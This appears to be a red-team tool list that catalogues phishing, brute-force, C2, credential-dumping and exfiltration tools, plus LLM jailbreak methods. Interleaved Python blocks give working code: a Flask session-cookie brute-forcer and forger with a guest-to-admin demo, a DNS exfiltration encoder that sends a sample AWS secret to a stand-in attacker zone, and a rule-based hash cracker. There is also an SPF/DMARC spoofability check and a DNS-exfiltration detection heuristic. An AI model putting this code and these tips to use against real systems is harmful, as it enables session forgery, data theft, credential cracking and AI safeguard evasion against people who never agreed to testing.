Defense Evasion
OSINT
| Repository | Description |
|---|---|
| Cloudmare | Cloudflare, Sucuri, Incapsula real IP tracker |
| crt.sh | Find certificates based on a domain name. Can be used to find subdomains |
| DorkSearch | Premade Google dork queries |
| ExifTool | Read (and modify) metadata of files |
| FaceCheck.ID | Reverse image lookup based on facial recognition |
| Hunter | Find company email format and list of employee email addresses |
| osintframework | An online database of OSINT tools |
| PimEyes | Reverse image lookup based on facial recognition |
| Recon-NG | Reconnaissance and OSINT framework. Has many modules such as port scanning, subdomain finding, Shodan, etc. |
| ScrapeIn | Scrapes LinkedIn to create a list of employee email addresses (for use in Initial Access) |
| SecurityTrails | Extensive DNS information |
| Shodan | Search engine for Internet-exposed devices and services |
| SpiderFoot | Automatic OSINT analysis |
| TheHarvester | Collects names, emails, IPs, and subdomains of a target |
Reconnaissance
| Repository | Description |
|---|---|
| altdns | Subdomain enumeration using mutated wordlists |
| AutoRecon | Multi-threaded network reconnaissance tool which performs automated enumeration of services |
| AWSBucketDump | Enumerate AWS S3 buckets to find interesting files |
| CameRadar | Discovers RTSP video-surveillance cameras and brute-forces their stream paths and credentials |
| CloudBrute | Enumerates "the cloud" (Google, AWS, DigitalOcean, etc.) to find infrastructure, files, and apps for a given target |
| dirb | Web application directory/file fuzzer to find other pages |
| DNSDumpster | Online tool for DNS information of a domain |
| feroxbuster | Web application directory/file fuzzer to find other pages |
| gobuster | Web application directory/file fuzzer to find other pages, with support for DNS and vhost fuzzing |
| GoWitness | Screenshots webpages. Supports multi-domain lists and Nmap output |
| Nikto | Web server scanner to perform security checks on a web server |
| Nmap | Finds open ports on a network. Additionally can detect service versions, OS, and more |
| Recon-NG | Reconnaissance and OSINT framework. Has many modules such as port scanning, subdomain finding, Shodan, etc. |
| subfinder | Passive subdomain discovery tool |
| wappalyzer | Identify what frameworks a website runs |
| wpscan | Automatic WordPress scanner to identify information about a WordPress site and possible vulnerabilities |
Social Engineering
| Repository | Description |
|---|---|
| evilginx | Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies, allowing for the bypass of 2-factor authentication |
| GoPhish | Phishing campaign framework to compromise user credentials |
| msfvenom | Generate malicious payloads for social engineering (e.g. VBA, .exe) |
| Social Engineering Toolkit | Social engineering framework |
| SpoofCheck | Checks whether a domain's SPF and DMARC records allow it to be spoofed |
| zphisher | Phishing campaign framework to compromise user credentials |
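The check a tool like SpoofCheck performs comes down to two TXT records. The following is an added example (not SpoofCheck's code): the SPF/DMARC records are passed in as strings so it runs offline, and the decision rules (an enforcing DMARC policy wins; a missing `all` mechanism, `+all`/`?all`, a partial `pct=`, or SPF without DMARC all count as spoofable) are this example's own assumptions. The records below are constructed.

```python
"""Offline SPF/DMARC spoofability check (added example, not SpoofCheck's code)."""
from __future__ import annotations

import re
from dataclasses import dataclass

# Qualifier (+ - ~ ?) on the SPF 'all' mechanism. The leading start/space
# anchor keeps 'include:all.example.com' from matching.
SPF_ALL_RE = re.compile(r"(?:^|\s)([+\-~?]?)all(?=\s|$)")


@dataclass
class Verdict:
    spoofable: bool
    reason: str


def spf_all_qualifier(spf: str | None) -> str | None:
    """Return '+', '-', '~' or '?' for the record's 'all' mechanism, None if absent.

    A record that only uses 'redirect=' carries no 'all' of its own; following the
    redirect needs DNS, so this offline check reports None for it (assumption).
    """
    if not spf or not spf.strip().lower().startswith("v=spf1"):
        return None
    m = SPF_ALL_RE.search(spf.lower())
    if not m:
        return None
    return m.group(1) or "+"  # a bare 'all' is '+all'


def parse_dmarc(dmarc: str | None) -> dict[str, str]:
    """Split 'v=DMARC1; p=reject; pct=100' into lowercase tag/value pairs."""
    if not dmarc or not dmarc.strip().lower().startswith("v=dmarc1"):
        return {}
    tags = {}
    for part in dmarc.split(";"):
        if "=" in part:
            key, value = part.split("=", 1)
            tags[key.strip().lower()] = value.strip().lower()
    return tags


def dmarc_policy(dmarc: str | None, subdomain: bool = False) -> str | None:
    """Effective policy: sp= applies to subdomains when present, otherwise p=."""
    tags = parse_dmarc(dmarc)
    if subdomain and "sp" in tags:
        return tags["sp"]
    return tags.get("p")


def check_spoofable(spf: str | None, dmarc: str | None, subdomain: bool = False) -> Verdict:
    tags = parse_dmarc(dmarc)
    policy = dmarc_policy(dmarc, subdomain)
    qual = spf_all_qualifier(spf)

    if policy in ("reject", "quarantine"):
        try:
            pct = int(tags.get("pct", "100"))
        except ValueError:
            pct = 100
        if pct < 100:
            return Verdict(True, f"DMARC p={policy} is only applied to pct={pct}% of mail")
        return Verdict(False, f"DMARC p={policy} enforces SPF/DKIM alignment on the header From")
    if qual is None:
        return Verdict(True, "no SPF record with an 'all' mechanism and no enforcing DMARC")
    if qual in ("+", "?"):
        return Verdict(True, f"SPF '{qual}all' accepts any sender")
    # '-all' / '~all' stop envelope-sender spoofing at receivers that check SPF,
    # but without DMARC nothing ties the visible header From to the SPF domain.
    return Verdict(True, f"SPF '{qual}all' but DMARC p={policy or 'none'}: header From is unenforced")


if __name__ == "__main__":
    # Constructed records for the demo.
    print(check_spoofable("v=spf1 include:_spf.example.net ~all", "v=DMARC1; p=reject"))
    print(check_spoofable("v=spf1 -all", None))
    print(check_spoofable(None, None))
```

In practice the two records come from TXT lookups of `example.com` and `_dmarc.example.com`; the `subdomain=True` path matters because `sp=none` on an otherwise strict parent leaves every subdomain spoofable.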
Leaked Credentials
Web Exploitation
| Repository | Description |
|---|---|
| Arachni | Web application security scanner framework |
| burpsuite | Full web testing suite, including proxied requests |
| Caido | Full web testing suite, including proxied requests (like Burp but written in Rust) |
| dirb | Web application directory/file fuzzer |
| dotGit | A Firefox and Chrome extension that shows you if there is an exposed .git directory |
| feroxbuster | Web application directory/file fuzzer |
| flask-unsign | Decode, bruteforce, and craft Flask session tokens |
| gobuster | Web application directory/file/DNS/vhost fuzzing |
| Nikto | Web server scanner to perform security checks on a web server |
| PayloadsAllTheThings | Useful payloads for a variety of attacks such as SQLi, IDOR, XSS, etc. |
| sqlmap | Performs automated SQL injection tests |
| w3af | Web application attack and audit framework |
| wappalyzer | Identify what frameworks a website runs |
| wpscan | Automatic WordPress scanner to identify information about a WordPress site and possible vulnerabilities |
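What flask-unsign does is worth seeing in code, because it shows why a Flask session cookie is readable by anyone and forgeable by anyone who guesses `SECRET_KEY`. The following is an added example, not flask-unsign's code: it reimplements, with the standard library only, the itsdangerous 2.x `URLSafeTimedSerializer` layout Flask uses (salt `cookie-session`, HMAC key derivation, SHA-1, optional zlib compression marked by a leading `.`) for plain-JSON sessions. The secret, session contents and wordlist below are constructed for the demo.

```python
"""Decode, brute-force and forge Flask session cookies (added example, not flask-unsign)."""
from __future__ import annotations

import base64
import hashlib
import hmac
import json
import time
import zlib

SALT = b"cookie-session"  # Flask's SecureCookieSessionInterface.salt


def b64e(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()


def b64d(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def split_cookie(cookie: str) -> tuple[str, str, str]:
    """'payload.timestamp.signature'; the payload starts with '.' when zlib-compressed."""
    payload, ts, sig = cookie.rsplit(".", 2)
    return payload, ts, sig


def decode_payload(payload: str) -> dict:
    """Read the session data without the secret: the cookie is signed, not encrypted."""
    compressed = payload.startswith(".")
    raw = b64d(payload[1:] if compressed else payload)
    if compressed:
        raw = zlib.decompress(raw)
    return json.loads(raw)


def decode_timestamp(ts: str) -> int:
    """itsdangerous 2.x stores the epoch seconds as a big-endian integer."""
    return int.from_bytes(b64d(ts), "big")


def signature(secret: str, signed_value: str) -> str:
    """key = HMAC-SHA1(secret, salt); sig = HMAC-SHA1(key, 'payload.timestamp')."""
    derived = hmac.new(secret.encode(), SALT, hashlib.sha1).digest()
    return b64e(hmac.new(derived, signed_value.encode(), hashlib.sha1).digest())


def sign_session(secret: str, session: dict, timestamp: int | None = None) -> str:
    data = json.dumps(session, separators=(",", ":"), sort_keys=True).encode()
    compressed = zlib.compress(data)
    if len(compressed) < len(data) - 1:  # same threshold itsdangerous applies
        payload = "." + b64e(compressed)
    else:
        payload = b64e(data)
    ts = int(time.time()) if timestamp is None else timestamp
    ts_b64 = b64e(ts.to_bytes((ts.bit_length() + 7) // 8 or 1, "big"))
    value = f"{payload}.{ts_b64}"
    return f"{value}.{signature(secret, value)}"


def verify(secret: str, cookie: str) -> bool:
    payload, ts, sig = split_cookie(cookie)
    return hmac.compare_digest(signature(secret, f"{payload}.{ts}"), sig)


def bruteforce_secret(cookie: str, wordlist) -> str | None:
    """Return the first candidate whose signature matches the cookie, else None."""
    payload, ts, sig = split_cookie(cookie)
    value = f"{payload}.{ts}"
    for candidate in wordlist:
        if hmac.compare_digest(signature(candidate, value), sig):
            return candidate
    return None


def forge(cookie: str, secret: str, changes: dict) -> str:
    """Keep the original timestamp, apply changes to the session, re-sign."""
    payload, ts, _ = split_cookie(cookie)
    session = decode_payload(payload)
    session.update(changes)
    return sign_session(secret, session, decode_timestamp(ts))


if __name__ == "__main__":
    cookie = sign_session("s3cr3t", {"user": "guest"})  # constructed demo cookie
    print(decode_payload(split_cookie(cookie)[0]))
    found = bruteforce_secret(cookie, ["password", "changeme", "s3cr3t"])
    print("secret:", found)
    print(forge(cookie, found, {"user": "admin"}))
```

Flask applications that set a non-default serializer or that run on itsdangerous 1.x (different timestamp encoding) need the corresponding adjustments; the decode step works regardless, since no secret is involved.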
Wireless
| Repository | Description |
|---|---|
| Aircrack-ng | Complete suite of tools to assess WiFi network security |
| Kismet | Sniffer, WIDS, and wardriving tool for Wi-Fi, Bluetooth, Zigbee, RF, and more |
| Reaver | Implements a brute force attack against WiFi Protected Setup (WPS) registrar PINs in order to recover WPA/WPA2 passphrases |
| Wifite | Python script to automate wireless auditing using aircrack-ng tools |
| WifiPhisher | The Rogue Access Point Framework |
Initial Access
| Repository | Description |
|---|---|
| Easysploit | Automatic Metasploit payload generator and shell listener |
| Impacket | Collection of Python classes and example scripts for Windows network protocols; `GetNPUsers.py` performs AS-REP roasting against accounts that do not require Kerberos pre-authentication |
| Kerbrute | Kerberos pre-authentication user enumeration and password spraying/bruteforcing tool |
| Medusa | Bruteforcer with multiple protocol support |
| Metasploit | Exploit framework that can be used for initial access and/or post-exploitation |
| NetExec | Bruteforce common Windows protocols (WinRM, LDAP, RDP, SMB, WMI, etc.). Try username `null` or `''` and password `''` for unauthenticated (null session) access |
| Searchsploit | Search ExploitDB for exploits |
| TeamFiltration | Cross-platform framework for enumerating, spraying, exfiltrating, and backdooring O365 AAD accounts |
| THC-Hydra | Bruteforcer with multiple protocol support |
| TREVORspray | Advanced password spraying tool for Active Directory environments |
C2 Frameworks
C2 frameworks can be considered both initial access and post-exploitation: they generate payloads to be used in phishing campaigns (initial access) and provide access to the host machine when the payload is run (post-exploitation).
| Repository | Description |
|---|---|
| Cobalt Strike | Mature commercial C2 and adversary-simulation framework (paid license) |
| Pupy | Python and C C2 framework |
| Sliver | Go C2 framework |
| Villain | Python and PowerShell C2 framework |
Post Exploitation
Modules for lateral movement, exfiltration, system enumeration, and more.
| Repository | Description |
|---|---|
| BloodHound | Active Directory visualizer, useful for finding misconfigurations and/or the shortest path to Domain Admin |
| BloodHound.py | Remote Python data ingestor for BloodHound |
| Impacket | A collection of Python scripts useful for Windows targets: psexec, smbexec, kerberoasting, ticket attacks, etc. |
| Mimikatz | Extracts plaintext passwords, hashes, PINs, and Kerberos tickets from Windows memory, and performs pass-the-hash, pass-the-ticket, and golden ticket attacks |
| nishang | Offensive PowerShell for red teaming, penetration testing, and offensive security |
| PowerHub | Post-exploitation module for bypassing endpoint protection and running arbitrary files |
| PowerSploit | A PowerShell post-exploitation framework with many modules: exfiltration, privilege escalation, etc. |
| SharpHound | C# data ingestor for BloodHound (SharpHound.ps1 is recommended for the BloodHound version packaged in Kali) |
Privilege Escalation
These tools automatically enumerate the current user's privileges and try to find misconfigurations that would allow escalation to `root` and/or `NT AUTHORITY\SYSTEM`.
| Repository | Description |
|---|---|
| BeRoot | Automated Windows, Linux, and Mac privilege escalation path discovery tool |
| GTFOBins | Curated list of Unix binaries that can be used to bypass local security restrictions in misconfigured systems |
| Invoke-PrivescCheck | Automated Windows privilege escalation path discovery tool |
| PEASS-ng | Automated Windows, Linux, and Mac privilege escalation path discovery tool |
| PowerUp | Automated Windows privilege escalation path discovery tool |
Exfiltration
Data exfiltration
| Repository | Description |
|---|---|
| DNSExfiltrator | Data exfiltration over a DNS request covert channel |
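A DNS covert channel works because a recursive resolver will forward any syntactically valid name to the authoritative server for the attacker's zone, so the data rides in the labels of the query. The following is an added example, not DNSExfiltrator's code: the wire format (a hex sequence label, base32 data labels of at most 63 characters, names of at most 253 characters, the attacker's zone as suffix) and the detection thresholds in `looks_like_exfil` are this example's own assumptions, and the exfiltrated payload and zone are constructed.

```python
"""DNS exfiltration encoder, reassembler and a resolver-log heuristic (added example)."""
from __future__ import annotations

import base64
import math
from collections import Counter

MAX_NAME = 253   # RFC 1035 limit on a full domain name
MAX_LABEL = 63   # RFC 1035 limit on a single label


def build_queries(data: bytes, zone: str, seq_width: int = 4) -> list[str]:
    """Split data into names like '0003.<b32>.<b32>.<zone>', each within the RFC limits."""
    payload = base64.b32encode(data).decode().rstrip("=").lower()  # DNS is case-insensitive
    queries, pos, seq = [], 0, 0
    while pos < len(payload):
        seq_label = f"{seq:0{seq_width}x}"          # lets the receiver reorder queries
        labels = [seq_label]
        name_len = len(seq_label) + 1 + len(zone)   # sequence label, dot, zone
        while pos < len(payload):
            room = MAX_NAME - name_len - 1          # one more dot plus the label
            if room < 1:
                break
            take = min(MAX_LABEL, room, len(payload) - pos)
            labels.append(payload[pos:pos + take])
            pos += take
            name_len += 1 + take
        queries.append(".".join(labels + [zone]))
        seq += 1
    return queries


def reassemble(queries: list[str], zone: str) -> bytes:
    """Rebuild the bytes from captured names, tolerating reordering and duplicates."""
    chunks: dict[int, str] = {}
    suffix = "." + zone
    for name in queries:
        if not name.endswith(suffix):
            continue
        labels = name[: -len(suffix)].split(".")
        chunks[int(labels[0], 16)] = "".join(labels[1:])
    payload = "".join(chunks[k] for k in sorted(chunks)).upper()
    return base64.b32decode(payload + "=" * (-len(payload) % 8))


def entropy(text: str) -> float:
    """Shannon entropy in bits per character."""
    counts = Counter(text)
    return -sum(c / len(text) * math.log2(c / len(text)) for c in counts.values())


def looks_like_exfil(name: str, zone_labels: int = 2) -> bool:
    """Resolver-log heuristic: long or high-entropy subdomain labels under a short zone.

    The thresholds (average label length > 30, or > 40 chars at > 3.5 bits/char)
    are assumptions for this example and should be tuned against real traffic.
    """
    labels = name.rstrip(".").split(".")[:-zone_labels]
    if not labels:
        return False
    sub = "".join(labels)
    avg = len(sub) / len(labels)
    return avg > 30 or (len(sub) > 40 and entropy(sub) > 3.5)


if __name__ == "__main__":
    secret = b"AWS_SECRET_ACCESS_KEY=wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY\n" * 10  # constructed
    zone = "x.example.net"  # constructed attacker zone
    qs = build_queries(secret, zone)
    print(len(qs), "queries, first:", qs[0])
    assert reassemble(list(reversed(qs)), zone) == secret
    print("flagged:", looks_like_exfil(qs[0]), "| www.example.com:", looks_like_exfil("www.example.com"))
```

Real tools add a per-session identifier label and a request for the data to be acknowledged (usually via the returned record); on the defensive side, the heuristic belongs beside per-client query-rate and unique-subdomain counts, since a single long name is easy to make shorter while a megabyte of data is not.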
Credential Dumping
These tools help dump cached credentials from a system.
| Repository | Description |
|---|---|
| certsync | Dump NTDS with golden certificates and UnPAC the hash |
| Dumpert | LSASS memory dumper using direct system calls and API unhooking |
| Impacket | Dump domain credentials via DCSync or from NTDS.DIT/SAM with `secretsdump.py` |
| Mimikatz | Dump local and domain credentials with the `sekurlsa` and `lsadump` modules |
Password Cracking
These tools assist in uncovering passwords, whether by cracking a hash or by generating candidates for password spraying attempts.
| Repository | Description |
|---|---|
| CeWL | Scrape websites to generate wordlists |
| crunch | Generate wordlists based on requirements such as minimum and maximum length, character sets, etc. |
| Cupp | Utilize OSINT to create password candidates for a specific person |
| hashcat | Password cracking tool |
| JohnTheRipper | Password cracking tool |
| Mentalist | A GUI for wordlist generation based on rules such as appending, prepending, etc. |
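The rule-based mutation these wordlist tools perform, and the cracking loop hashcat and John run over the result, fit in a few dozen lines. The following is an added example, not hashcat's, John's or Mentalist's code: it implements a small subset of the hashcat rule syntax (`:` `l` `u` `c` `r` `d` `$X` `^X` `sXY`, space-separated on one rule line) and cracks SHA-256 hex digests with it. The wordlist, rules and target hashes are constructed for the demo.

```python
"""Rule-based wordlist mutation and hash cracking (added example, not hashcat/John/Mentalist)."""
from __future__ import annotations

import hashlib
from typing import Iterable, Iterator


def sha256_hex(text: str) -> str:
    return hashlib.sha256(text.encode()).hexdigest()


def apply_rule(word: str, rule: str) -> str:
    """Apply one rule line (space-separated functions) to a word, left to right.

    Supported subset of hashcat rule functions: ':' no-op, 'l' lowercase,
    'u' uppercase, 'c' capitalize, 'r' reverse, 'd' duplicate, '$X' append X,
    '^X' prepend X, 'sXY' replace X with Y. Because functions are split on
    whitespace, a literal space cannot be appended or prepended here.
    """
    for func in rule.split():
        op = func[0]
        if op == ":":
            continue
        elif op == "l":
            word = word.lower()
        elif op == "u":
            word = word.upper()
        elif op == "c":
            word = word[:1].upper() + word[1:].lower()
        elif op == "r":
            word = word[::-1]
        elif op == "d":
            word = word * 2
        elif op == "$" and len(func) == 2:
            word = word + func[1]
        elif op == "^" and len(func) == 2:
            word = func[1] + word
        elif op == "s" and len(func) == 3:
            word = word.replace(func[1], func[2])
        else:
            raise ValueError(f"unsupported rule function: {func!r}")
    return word


def candidates(words: Iterable[str], rules: Iterable[str]) -> Iterator[str]:
    """Yield every word under every rule, de-duplicated (like 'hashcat --stdout -r rules')."""
    rules = list(rules)
    seen: set[str] = set()
    for word in words:
        for rule in rules:
            cand = apply_rule(word, rule)
            if cand not in seen:
                seen.add(cand)
                yield cand


def crack_sha256(targets: Iterable[str], words: Iterable[str], rules: Iterable[str]) -> dict[str, str]:
    """Map each cracked hex digest to its plaintext; digests not cracked are absent."""
    remaining = {h.lower() for h in targets}
    found: dict[str, str] = {}
    for cand in candidates(words, rules):
        digest = sha256_hex(cand)
        if digest in remaining:
            found[digest] = cand
            remaining.discard(digest)
            if not remaining:
                break
    return found


if __name__ == "__main__":
    # Constructed demo: a leaked-looking hash list, a tiny wordlist and three rules.
    hashes = [sha256_hex("Password1!"), sha256_hex("p@ssw0rd"), sha256_hex("not-in-list")]
    wordlist = ["password", "welcome", "summer"]
    rules = [":", "c $1 $!", "sa@ so0"]
    for digest, plain in crack_sha256(hashes, wordlist, rules).items():
        print(f"{digest[:16]}...:{plain}")
```

Unsalted SHA-256 is used only so the demo runs offline; the same candidate generator feeds whichever hash the target actually uses, and the candidate stream is equally usable as a spray list once rule output is filtered to the target's password policy.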
AI / LLM
This section will probably be outdated quickly.
| Repository | Description |
|---|---|
| HarmBench | A standardized evaluation framework for automated red teaming and robust refusal |
| Adversarial Suffix | Jailbreak based on appending an optimized adversarial suffix to a potentially malicious query |
| AutoDAN-Turbo | Black-box jailbreak method that can automatically discover as many jailbreak strategies as possible from scratch |
| Best-of-N | Black-box algorithm that jailbreaks frontier AI systems across modalities (text, vision, audio) by repeatedly mutating the original query and sampling |